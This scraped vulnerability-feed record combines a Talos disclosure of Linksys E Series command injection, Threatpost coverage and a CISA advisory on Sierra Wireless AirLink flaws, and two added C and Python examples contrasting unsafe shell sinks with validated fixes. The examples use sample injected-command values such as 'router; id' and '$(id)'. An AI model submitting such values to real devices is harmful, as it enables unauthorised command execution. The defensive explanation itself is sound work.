"[](<https://2.bp.blogspot.com/-jp7H9n8hxiE/W8YNvsnT6VI/AAAAAAAAANU/LpwHdxH8cmw2fv5VPlwPWsxo8zL7hk0fACLcBGAs/s1600/image1.jpg>)\n\n \n \n_These vulnerabilities were discovered by Jared Rittle of Cisco Talos._ \n \nCisco Talos is disclosing several vulnerabilities in the operating system on the Linksys E Series of routers. \n \nMultiple exploitable OS command injection vulnerabilities exist in the Linksys E Series line of routers. An attacker can exploit these bugs by sending an authenticated HTTP request to the network configuration. An attacker could then gain the ability to arbitrarily execute code on the machine. \n \nThe E Series is a line of routers for small and home offices that contain several features to make them easier to use. The routers are designed to connect home computers, internet-ready TVs, game consoles, smartphones and other Wi-Fi devices. 
\n \n**Vulnerability Details** \n \n[TALOS-2018-0625](<http://www.talosintelligence.com/reports/TALOS-2018-0625>) describes three related vulnerabilities: CVE-2018-3953, CVE-2018-3954 and CVE-2018-3955. \n \nMany of the configuration details passed to the E Series of routers during their configuration must be retained across a device's power cycle. Since the device has only one writable directory (/tmp) and that directory is cleared on reboot, the device uses NVRAM to store configuration details. \n \nAll command injection paths follow this process: \n \nWhen the apply.cgi page is requested with parameters indicating a change to persistent configuration settings, those parameters are processed by a 'get_cgi' function call and then placed directly into NVRAM via an 'nvram_set' call. \n \nAfter certain configuration changes are made, including both of the changes associated with these vulnerabilities, the device must be rebooted. The httpd binary handles this by sending a SIGHUP signal to PID 1, a binary named 'preinit'. The device then enters a code path where it restarts all necessary system services. \n \nWhen the 'preinit' binary enters this code path, it exposes functionality where raw data from nvram_get calls is passed into system commands. \n \nIn CVE-2018-3953, the data entered into the 'Router Name' input field through the web portal is submitted to apply.cgi as the value to the 'machine_name' POST parameter. The machine_name data goes through the nvram_set process described above. Eventually, within the 'start_lltd' function, a 'nvram_get' call is used to obtain the value of the user-controlled 'machine_name' NVRAM entry. This value is then entered directly into a command string intended to write the hostname to a file, and that string is then executed. \n \nCVE-2018-3954 applies to the same input field but follows a slightly different code path. 
Here, the vulnerability is triggered by the 'set_host_domain_name' function in libshared.so, where nvram_get is called against the 'machine_name' parameter. The result of that operation is subsequently combined with a string via a sprintf call and passed directly into the system command. \n \nFinally, in CVE-2018-3955, the data entered into the 'Domain Name' input field through the web portal is submitted to apply.cgi as the value to the 'wan_domain' POST parameter. The wan_domain data goes through the nvram_set process described above. \n \nWhen the 'preinit' binary receives the SIGHUP signal, it enters a code path that calls a function named 'set_host_domain_name' from its libshared.so shared object, which calls nvram_get against the 'wan_domain' parameter. The result of that operation is subsequently combined with a string via a snprintf call and passed directly into the system command. \n\n\n### Affected devices\n\nThe vulnerabilities are confirmed in multiple devices of the Linksys E Series of wireless routers with various firmware versions. Users are advised to update their routers to the latest version released by the manufacturer. \n\n\n## Discussion\n\nHome routers have become one of the main targets for malicious attacks. Although these vulnerabilities require the attacker to have already authenticated with the device, they are serious because they give a potential attacker full control over the device, which may include installation of additional malicious code. \n \nWidespread internet-of-things attacks such as Mirai and [VPNFilter](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>) show that attackers will keep their focus on discovering new vulnerabilities that would allow them to infect devices and conduct large-scale as well as targeted attacks. These attacks are more difficult to detect, and protection is available only after the manufacturer updates the firmware and patches the vulnerability. 
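The apply.cgi, nvram_set, SIGHUP, nvram_get, system() flow described above, as an added example that is not Linksys's code and not from the advisory: the in-memory NVRAM stand-in, the function names and the sample Router Name value are assumptions made for this illustration. It shows the unsafe sink beside the two checks that close it, validating the value as a hostname before it is persisted and writing the file directly rather than through a shell when it is consumed.

```c
#include <stdio.h>
#include <string.h>

/* In-memory stand-in for the router's NVRAM API. The real nvram_get and
 * nvram_set live in libnvram; the flow is the same: apply.cgi stores the
 * value, preinit reads it back after the SIGHUP-triggered restart. */
static char machine_name[64] = "linksys";

void nvram_set_machine_name(const char *value)
{
    snprintf(machine_name, sizeof machine_name, "%s", value);
}

const char *nvram_get_machine_name(void)
{
    return machine_name;
}

/* Reconstruction of the sink the advisory describes: the raw NVRAM value
 * is formatted straight into a shell command line. Any shell metacharacter
 * in the Router Name (';', '&', '|', backticks, "$(...)") becomes part of
 * the command. Returns the string that would be passed to system(); the
 * call itself is deliberately left out of this example. */
const char *build_hostname_cmd_unsafe(char *cmd, size_t cmdlen)
{
    snprintf(cmd, cmdlen, "echo %s > /tmp/hostname", nvram_get_machine_name());
    return cmd;
}

int unsafe_cmd_equals(const char *want)
{
    char cmd[128];
    return strcmp(build_hostname_cmd_unsafe(cmd, sizeof cmd), want) == 0;
}

/* Input gate: RFC 1123 host label only (letters, digits, hyphen; 1 to 63
 * characters; no leading or trailing hyphen). Nothing the shell treats
 * specially can pass, so the value stays safe even if some other code
 * path still interpolates it into a command. */
int is_valid_hostname(const char *name)
{
    size_t n = strlen(name);

    if (n == 0 || n > 63 || name[0] == '-' || name[n - 1] == '-')
        return 0;
    for (size_t i = 0; i < n; i++) {
        char c = name[i];
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') || c == '-'))
            return 0;
    }
    return 1;
}

/* apply.cgi side: validate before nvram_set. Returns 0 on success, -1 if
 * the value was refused (NVRAM is left unchanged). */
int set_machine_name(const char *value)
{
    if (!is_valid_hostname(value))
        return -1;
    nvram_set_machine_name(value);
    return 0;
}

/* preinit side: re-validate (NVRAM may have been written by another path
 * or by older firmware) and write the file with stdio, so there is no
 * shell to inject into. Returns 0 on success, -1 on rejection or I/O error. */
int write_hostname_safe(const char *path)
{
    const char *name = nvram_get_machine_name();
    FILE *f;
    int rc;

    if (!is_valid_hostname(name))
        return -1;
    if ((f = fopen(path, "w")) == NULL)
        return -1;
    rc = (fputs(name, f) >= 0 && fputc('\n', f) != EOF) ? 0 : -1;
    if (fclose(f) != 0)
        rc = -1;
    return rc;
}

int main(void)
{
    char cmd[128];

    /* Constructed Router Name carrying a second shell command. */
    nvram_set_machine_name("router; id");           /* what the unpatched apply.cgi does */
    printf("unsafe sink would run: %s\n", build_hostname_cmd_unsafe(cmd, sizeof cmd));
    printf("validated store: %d, validated write: %d\n",
           set_machine_name("router; id"), write_hostname_safe("/tmp/hostname.example"));
    return 0;
}
```

Checking at both ends matters here because NVRAM is a shared store: fixing only apply.cgi leaves preinit trusting whatever a different writer (another CGI, a restore-from-backup path, a downgraded firmware) put there.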
\n \nKeeping the device firmware up to date is crucial to avoid SOHO routers participating in a distributed denial-of-service (DDoS) attack or becoming an infection vector in an attack targeted to your organization. \n \n\n\n[](<http://downloads.linksys.com/downloads/firmware/FW_E2500_3.0.05.002_20180914.bin>)\n\n## \n\n## Coverage\n\nThe following SNORT\u24c7 rule detects attempts to exploit these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For all current rule information, please refer to your Firepower Management Center or Snort.org. \n \nSnort rule: 47133 \n \n \n\n\n", "cvss3": {}, "published": "2018-10-16T09:25:00", "type": "talosblog", "title": "Vulnerability Spotlight: Linksys ESeries Multiple OS Command Injection Vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-3953", "CVE-2018-3954", "CVE-2018-3955"], "modified": "2018-10-16T17:30:58", "id": "TALOSBLOG:DA58A7666C6D2C98A3062307E13300AA", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/uHiEV5Ec19w/vulnerability-spotlight-linksys-eseries.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2020-04-08T11:52:13", "description": "A 5G wireless gateway tailored for industrial internet of things (IoT), retail point-of-sale and enterprise redundancy applications is riddled with vulnerabilities, include two critical bugs that allow remote code-execution (RCE) and arbitrary command-injection.\n\nThe Sierra Wireless AirLink ES450 LTE gateway (version 4.9.3) has 11 different bugs, which could be exploited for RCE, uncovering user credentials (including the administrator\u2019s password) and other scenarios, according to Cisco Talos, which found the issues. 
Sierra Wireless has issued an update and administrators are encouraged to apply it.\n\n\u201cThe majority of these vulnerabilities exist in ACEManager, the web server included with the ES450,\u201d Cisco explained in [an advisory](<https://blog.talosintelligence.com/2019/04/vulnerability-sierra-airlink.html>) on Thursday. \u201cACEManager is responsible for the majority of interactions on the device, including device reconfiguration, user authentication and certificate management.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe most serious of the flaws is a critical RCE vulnerability ([CVE-2018-4063](<https://www.talosintelligence.com/reports/TALOS-2018-0748>)), CVSS score of 9.9, in the upload.cgi function of the ACEManager, which allows an attacker to use a specially crafted HTTP request to upload executable code, to be routed to the web server.\n\n\u201cWhen uploading template files, you can specify the name of the file that you are uploading,\u201d according to Cisco. \u201cThere are no restrictions in place that protect the files that are currently on the device, used for normal operation. If a file is uploaded with the same name of the file that already exists in the directory, then we inherit the permissions of that file.\u201d\n\nFurther, since ACEManager is running as root, any executables that are run by those files will be running also as root. 
\u201cBy uploading a small wrapper, we can upload arbitrary code to the device and run it by simply navigating to the web page through the browser,\u201d Cisco noted.\n\nAlso in the upload.cgi function, an unverified password change vulnerability ([CVE-2018-4064](<https://www.talosintelligence.com/reports/TALOS-2018-0749>)) opens the door to an unverified device configuration change, resulting in an unverified change of the `user` password on the device.\n\nIn both cases, an attacker exploiting the upload.cgi bugs can make an authenticated HTTP request to trigger the vulnerability.\n\nThere\u2019s also a critical command-injection vulnerability ([CVE-2018-4061](<https://www.talosintelligence.com/reports/TALOS-2018-0746>)), CVSS score of 9.9, which exists in the ACEManager iplogging.cgi functionality. An authenticated attacker can send a specially crafted HTTP request to inject arbitrary commands, resulting in arbitrary command execution as root. This bug most likely also affects the AirLink GX450 product, Cisco added.\n\nAnother problem arises from having hard-coded credentials ([CVE-2018-4062](<https://www.talosintelligence.com/reports/TALOS-2018-0747>)) in the SNMPD function of the gateway.\n\n\u201cActivating SNMPD outside of the WebUI can cause the activation of the hard-coded credentials, resulting in the exposure of a privileged user,\u201d according to Cisco. \u201cAn attacker can activate SNMPD without any configuration changes to trigger this vulnerability.\u201d\n\nMeanwhile, there are four information-disclosure vulnerabilities. 
For one, the ACEManager authentication functionality is performed in plaintext XML to the web server ([CVE-2018-4069](<https://www.talosintelligence.com/reports/TALOS-2018-0754>)), so an attacker who can listen to network traffic upstream from the device can sniff out credentials.\n\nThe other three ([CVE-2018-4067](<https://www.talosintelligence.com/reports/TALOS-2018-0752>), [CVE-2018-4068](<https://www.talosintelligence.com/reports/TALOS-2018-0753>) and [CVE-2018-4070/CVE-2018-4071](<https://www.talosintelligence.com/reports/TALOS-2018-0755>)) can expose internal paths and files; the default configuration for the device; or plaintext passwords and SNMP community strings. An attacker can send a specially crafted HTTP request to trigger any of these (the CISA advisory reproduced below rates CVE-2018-4067 as requiring authentication).\n\nOther bugs include a permission assignment vulnerability ([CVE-2018-4072/CVE-2018-4073](<https://www.talosintelligence.com/reports/TALOS-2018-0756>)), a cross-site scripting (XSS) vulnerability ([CVE-2018-4065](<https://www.talosintelligence.com/reports/TALOS-2018-0750>)) and a cross-site request forgery (CSRF) vulnerability ([CVE-2018-4066](<https://www.talosintelligence.com/reports/TALOS-2018-0751>)).\n\nThe gateway is billed as \u201ca reliable, secure LTE gateway,\u201d and is one of the first to market to capitalize on the deployment of next-generation 5G mobile networks, which are expected to support [a whole raft of new use cases](<https://threatpost.com/5g-security/140664/>), especially in the industrial IoT space. But as these flaws illustrate, vulnerabilities come with any new territory.\n\n\u201cHistory has shown us that when we expand our computing power and connectivity, we open up a new landscape for attackers to use against us, with prime examples of this being the cloud and connected IoT devices,\u201d Steve McGregory, senior director of application and threat intelligence at Ixia, told Threatpost. 
He added, \u201cWe are racing into 5G just as we did with IoT and the cloud\u2026if that trend is to continue, then we must plan and prepare.\u201d\n", "cvss3": {}, "published": "2019-04-26T16:12:06", "type": "threatpost", "title": "Critical Flaws in Sierra Wireless 5G Gateway Allow RCE, Command Injection", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-4061", "CVE-2018-4062", "CVE-2018-4063", "CVE-2018-4064", "CVE-2018-4065", "CVE-2018-4066", "CVE-2018-4067", "CVE-2018-4068", "CVE-2018-4069", "CVE-2018-4070", "CVE-2018-4071", "CVE-2018-4072", "CVE-2018-4073", "CVE-2020-0688"], "modified": "2019-04-26T16:12:06", "id": "THREATPOST:142DAF150C2BF9EB70ECE95F46939532", "href": "https://threatpost.com/critical-flaws-sierra-wireless-5g/144142/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-11T11:47:59", "description": "Sierra Wireless is warning that additional AirLink router models, which are targeted toward IoT applications, are vulnerable to previously-disclosed critical flaws.\n\nThe vulnerabilities are part of the 11 critical bugs disclosed on [Sierra Wireless\u2019 AirLink](<https://threatpost.com/critical-flaws-sierra-wireless-5g/144142/>) ES450 LTE router last week \u2013 only now, Sierra Wireless has extended the impact of those flaws to 11 other router models that are using the ALEOS software.\n\nSierra Wireless has released fixes; users are encouraged to apply patches as soon as possible.\n\nSierra Wireless\u2019 LTE AirLink routers are targeted toward embedded applications like transmitting data for fleets of vehicles (for example, in law enforcement settings, the routers collect data on whether a police car has engaged its lights and siren) and industrial machines (tracking the location of heavy equipment and assets for instance). 
ALEOS is the software powering these in-field devices, which enables users to collect and view data in real time.\n\nOverall, the company patched seven vulnerabilities, two critical and five medium-severity, stemming from the ALEOS software on the AirLink routers: \u201cSuccessful exploitation of these vulnerabilities could allow attackers to remotely execute code, discover user credentials, upload files, or discover file paths,\u201d according to a [Thursday advisory](<https://ics-cert.us-cert.gov/advisories/ICSA-19-122-03>).\n\nSierra Wireless said the following AirLink models (with the ALEOS software) are impacted: LS300, GX400, GX440, and ES440 (Version 4.4.8 and prior); GX450 and ES450 (All versions prior to 4.9.4); and MP70, MP70E, RV50, RV50X, LX40, and LX60 (All versions prior to 4.12).\n\nThe two most severe vulnerabilities are an OS command-injection flaw ([CVE-2018-4061](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4061>)), and an unrestricted file upload glitch ([CVE-2018-4063](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4063>)), both of which rank 9.1 out of 10 on the CVSS scale, making them critical in severity.\n\nCVE-2018-4061 exists in the way the web server behind the routers, ACEManager, constructs OS commands: it fails to neutralize special elements in attacker-controlled input that can modify the intended OS command. 
That means an attacker could create a specially crafted authenticated HTTP request that injects arbitrary commands and results in remote code execution.\n\n[AirLink Router](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/05/03095102/sierra-wireless-mp70-telemetry-solution-1a.jpg>)\n\n\u201cThis weakness can lead to a vulnerability in environments in which the attacker does not have direct access to the operating system, such as in web applications,\u201d according to [MITRE\u2019s description of CWE-78](<https://cwe.mitre.org/data/definitions/78.html>). \u201cAlternately, if the weakness occurs in a privileged program, it could allow the attacker to specify commands that normally would not be accessible, or to call alternate commands with privileges that the attacker does not have. The problem is exacerbated if the compromised process does not follow the principle of least privilege, because the attacker-controlled commands may run with special system privileges that increases the amount of damage.\u201d\n\nCVE-2018-4063 meanwhile allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product\u2019s environment.\n\nThat means an attacker could use a specially crafted authenticated HTTP request to upload a file, resulting in executable, routable code on the web server.\n\nThe routers also contain five medium-severity vulnerabilities. Those include a cross-site request forgery glitch, which may allow an attacker access to authenticated pages via an authenticated user ([CVE-2018-4066](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4066>)); and a flaw that could activate hard-coded credentials ([CVE-2018-4062](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4062>)), then allowing for the exposure of a privileged user. 
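The CWE-78 pattern quoted above, shown as an added example written for this page (it is not Sierra Wireless, Talos or MITRE code). The `ping` handler, its function names and the constructed inputs are hypothetical and stand in for a router web endpoint such as ACEManager's iplogging.cgi, whose real code is not public. The vulnerable form splices a user-supplied target into a shell string; the hardened form allow-lists the target as an IP literal or RFC 1123 hostname and hands it to `ping` as one argv element, with no shell involved.

```python
"""CWE-78 in a router-style 'ping' handler: vulnerable form beside the hardened form.

Added example for this page, not code from Sierra Wireless, TP-Link, Talos or MITRE.
Function names, the argv layout and the sample inputs are hypothetical.
"""
import ipaddress
import re
import subprocess
from typing import List

# RFC 1123 hostname: labels of 1-63 chars, no leading/trailing '-', total <= 253.
# The no-leading-'-' rule also blocks argument injection such as "-f 10.0.0.1".
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def build_ping_command_vulnerable(target: str) -> str:
    """The CWE-78 pattern: the user value is spliced into a shell command string.

    Anything /bin/sh treats specially in `target` (';', '|', '`', '$(...)')
    becomes part of the command the web server executes, with the web
    server's privileges (root, in ACEManager's case).
    """
    return "ping -c 1 " + target


def validate_ping_target(target: str) -> str:
    """Allow-list the target: an IPv4/IPv6 literal or an RFC 1123 hostname.

    Returns the canonical form and raises ValueError for anything else, so
    shell metacharacters and option-like values never reach the command.
    """
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if _HOSTNAME_RE.fullmatch(target):
        return target
    raise ValueError(f"rejected ping target: {target!r}")


def build_ping_argv(target: str) -> List[str]:
    """Hardened form: the validated target is a single argv element; no shell parses it."""
    return ["ping", "-c", "1", validate_ping_target(target)]


def run_ping(target: str, timeout: float = 5.0) -> subprocess.CompletedProcess:
    """Execute the hardened argv. A list argument means shell=False: no /bin/sh at all."""
    return subprocess.run(build_ping_argv(target), capture_output=True,
                          text=True, timeout=timeout, check=False)


if __name__ == "__main__":
    # Constructed inputs: one benign target and three injection attempts.
    for candidate in ("10.0.0.1", "10.0.0.1; id", "$(id)", "-f 10.0.0.1"):
        print("vulnerable shell string:", build_ping_command_vulnerable(candidate))
        try:
            print("hardened argv:          ", build_ping_argv(candidate))
        except ValueError as exc:
            print("hardened argv:           rejected ->", exc)
```

Rejecting rather than quoting is deliberate: `shlex.quote()` would neutralise shell metacharacters, but it does nothing about argument injection (a target such as `-f 10.0.0.1`), which the allow-list also blocks. The process should in addition run as an unprivileged user, since, as the CWE-78 text above notes, the damage from an injected command scales with the privilege of the process that executes it.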
Another flaw could enable a specially crafted HTTP ping request to cause reflected JavaScript to be executed in the user\u2019s browser ([CVE-2018-4065](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4065>)).\n\nThe software also lacks encryption for some sensitive data ([CVE-2018-4069](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4069>)) and contains an information-exposure flaw ([CVE-2018-4067](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4067>)).\n\nThe vulnerabilities were first reported by Carl Hurd and Jared Rittle of Cisco Talos.\n\nIn May 2018, Sierra Wireless [also patched](<https://threatpost.com/sierra-wireless-patches-critical-vulns-in-hundreds-of-thousands-of-wireless-routers/131804/>) two critical vulnerabilities for its range of routers that would have left the enterprise devices exposed to an array of remote threats.\n", "cvss3": {}, "published": "2019-05-03T14:36:25", "type": "threatpost", "title": "Multiple Sierra Wireless AirLink Routers Open to Remote Code Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-4061", "CVE-2018-4062", "CVE-2018-4063", "CVE-2018-4065", "CVE-2018-4066", "CVE-2018-4067", "CVE-2018-4069"], "modified": "2019-05-03T14:36:25", "id": "THREATPOST:4659C6740BE64D50B985F32560628891", "href": "https://threatpost.com/sierra-wireless-airlink-remote-code-execution/144332/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-12-01T16:23:04", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.1**\n * **ATTENTION:** Exploitable remotely/low skill level to exploit/public exploits are available\n * **Vendor:** Sierra Wireless\n * **Equipment:** AirLink ALEOS\n * **Vulnerabilities:** OS Command Injection, Use of Hard-coded Credentials, Unrestricted Upload of File with Dangerous Type, Cross-site Scripting, Cross-site Request Forgery, Information Exposure, Missing Encryption of Sensitive Data\n\n## 2\\. 
UPDATE INFORMATION\n\nThis updated advisory is a follow-up to the original advisory titled ICSA-19-122-03 Sierra Wireless AirLink ALEOS (Update A) that was published August 20, 2019, on the ICS webpage on us-cert.gov.\n\n## 3\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could allow attackers to remotely execute code, discover user credentials, upload files, or discover file paths.\n\n## 4\\. TECHNICAL DETAILS\n\n### 4.1 AFFECTED PRODUCTS\n\nSierra Wireless reports the vulnerabilities affect the following AirLink ALEOS versions and products:\n\n**\\--------- Begin Update B Part 1 of 2 ---------**\n\n * LS300, GX400, GX440, and ES440: All versions prior to 4.4.9\n\n**\\--------- End Update B Part 1 of 2 ---------**\n\n * GX450 and ES450: All versions prior to 4.9.4\n * MP70, MP70E, RV50, RV50X, LX40, and LX60: All versions prior to 4.12\n\n### 4.2 VULNERABILITY OVERVIEW\n\n#### 4.2.1 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN OS COMMAND ('OS COMMAND INJECTION') CWE-78](<https://cwe.mitre.org/data/definitions/78.html>)\n\nA specially crafted authenticated HTTP request can inject arbitrary commands, resulting in remote code execution.\n\n[CVE-2018-4061](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4061>) has been assigned to this vulnerability. A CVSS v3 base score of 9.1 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H>)).\n\n#### 4.2.2 [USE OF HARD-CODED CREDENTIALS CWE-798](<https://cwe.mitre.org/data/definitions/798.html>)\n\nActivating SNMPD outside of the WebUI can cause the activation of the hard-coded credentials, resulting in the exposure of a privileged user. An attacker can activate SNMPD without any configuration changes to trigger this vulnerability.\n\n[CVE-2018-4062](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4062>) has been assigned to this vulnerability. 
A CVSS v3 base score of 6.2 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:L/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:L/A:H>)).\n\n#### 4.2.3 [UNRESTRICTED UPLOAD OF FILE WITH DANGEROUS TYPE CWE-434](<https://cwe.mitre.org/data/definitions/434.html>)\n\nA specially crafted authenticated HTTP request can upload a file, resulting in an executable, routable code upload to the web server.\n\n[CVE-2018-4063](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4063>) has been assigned to this vulnerability. A CVSS v3 base score of 9.1 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H>)).\n\n#### 4.2.4 [IMPROPER NEUTRALIZATION OF INPUT DURING WEB PAGE GENERATION ('CROSS-SITE SCRIPTING') CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\nA specially crafted HTTP ping request can cause reflected JavaScript to be executed and run on the user\u2019s browser. An attacker can exploit this by convincing a user to click a link or embedded URL that redirects to the reflected cross-site scripting vulnerability.\n\n[CVE-2018-4065](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4065>) has been assigned to this vulnerability. A CVSS v3 base score of 6.1 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N>)).\n\n#### 4.2.5 [CROSS-SITE REQUEST FORGERY (CSRF) CWE-352](<https://cwe.mitre.org/data/definitions/352.html>)\n\nA specially crafted HTTP request can cause an authenticated user to perform privileged requests unknowingly, resulting in unauthenticated requests through an authenticated user. 
Triggering this vulnerability may allow an attacker access to authenticated pages via an authenticated user.\n\n[CVE-2018-4066](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4066>) has been assigned to this vulnerability. A CVSS v3 base score of 6.8 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:H>)).\n\n#### 4.2.6 [INFORMATION EXPOSURE CWE-200](<https://cwe.mitre.org/data/definitions/200.html>)\n\nA specially crafted authenticated HTTP request can cause an information leak, resulting in the disclosure of internal file paths.\n\n[CVE-2018-4067](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4067>) has been assigned to this vulnerability. A CVSS v3 base score of 4.1 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N>)).\n\n#### 4.2.7 [MISSING ENCRYPTION OF SENSITIVE DATA CWE-311](<https://cwe.mitre.org/data/definitions/311.html>)\n\nThe ACEManager authentication functionality is delivered in plaintext XML to the web server. An attacker can listen to network traffic upstream from the device, which may allow access to credentials.\n\n[CVE-2018-4069](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4069>) has been assigned to this vulnerability. 
A CVSS v3 base score of 5.9 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N>)).\n\n### 4.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Commercial Facilities, Communications, Emergency Services, Energy, Government Facilities, Transportation Systems, Water and Wastewater Systems\n * **COUNTRIES/AREAS DEPLOYED:** Worldwide\n * **COMPANY HEADQUARTERS LOCATION: **Canada\n\n### 4.4 RESEARCHER\n\nCarl Hurd and Jared Rittle of Cisco Talos reported these vulnerabilities to Sierra Wireless.\n\n## 5\\. MITIGATIONS\n\n**\\--------- Begin Update B Part 2 of 2 ---------**\n\nSierra Wireless recommends users upgrade to the latest version of ALEOS for the products and versions below. For upgrade assistance, contact an authorized AirLink reseller, Sierra Wireless sales, technical representative, or Sierra Wireless technical support.\n\n * LS300, GX400, GX440, ES440: ALEOS 4.4.9 \n * The [ALEOS 4.4.9 Release Note](<https://source.sierrawireless.com/resources/airlink/software_reference_docs/release-notes/aleos-4,-d-,4,-d-,9-release-notes/>) is available (login required)\n * GX450, ES450: ALEOS 4.9.4.p09\n * MP70, MP70E, RV50, RV50X, LX40, LX60: ALEOS 4.12 \n * The [ALEOS 4.12.0 Release Note](<https://source.sierrawireless.com/resources/airlink/software_reference_docs/release-notes/aleos-4,-d-,12,-d-,0-release-notes/>) is available (login required)\n\n**\\--------- End Update B Part 2 of 2 ---------**\n\nSierra Wireless recommends users follow the actions outlined below:\n\n * Ensure a strong password is set for the user account. 
For guidance on password strength, Sierra Wireless recommends the \u201cmemorized secret authenticator\u201d guidelines in NIST SP 800-63B.\n * If ALEOS Application Framework (AAF) is enabled, ensure a strong password is set for the AAF User account.\n * If Telnet or SSH is enabled, ensure a strong password is set for the console account.\n\nWhen connecting directly to ACEManager:\n\n * Use only HTTPS.\n * Utilize an up-to-date, modern web browser with built-in XSS and CSRF protection, such as Chrome, Firefox, or Edge.\n\nFor more information, see the [Sierra Wireless security advisory](<https://source.sierrawireless.com/resources/airlink/software_reference_docs/technical-bulletin/sierra-wireless-technical-bulletin---swi-psa-2019-003/>).\n\nThe following SNORT rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to a Firepower Management Center or Snort.org.\n\nSnort Rules: 48600, 48635, 48614 - 48621, 48747\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are [not accessible from the Internet.](<https://www.us-cert.gov/ics/alerts/ICS-ALERT-10-301-01>)\n * Locate control system networks and remote devices behind firewalls and isolate them from the business network.\n * When remote access is required, use secure methods, such as virtual private networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. 
Also recognize that a VPN is only as secure as the connected devices.\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nCISA also provides a section for [control systems security recommended practices](<https://www.us-cert.gov/ics/Recommended-Practices>) on the ICS webpage on [us-cert.gov](<https://www.us-cert.gov/>). Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.gov](<https://www.us-cert.gov/ics>) in the technical information paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nCISA also recommends users take the following measures to protect themselves from social engineering attacks: \n\n * Do not click web links or open unsolicited attachments in email messages. \n * Refer to [Recognizing and Avoiding Email Scams](<https://www.us-cert.gov/sites/default/files/publications/emailscams_0905.pdf>) for more information on avoiding email scams. 
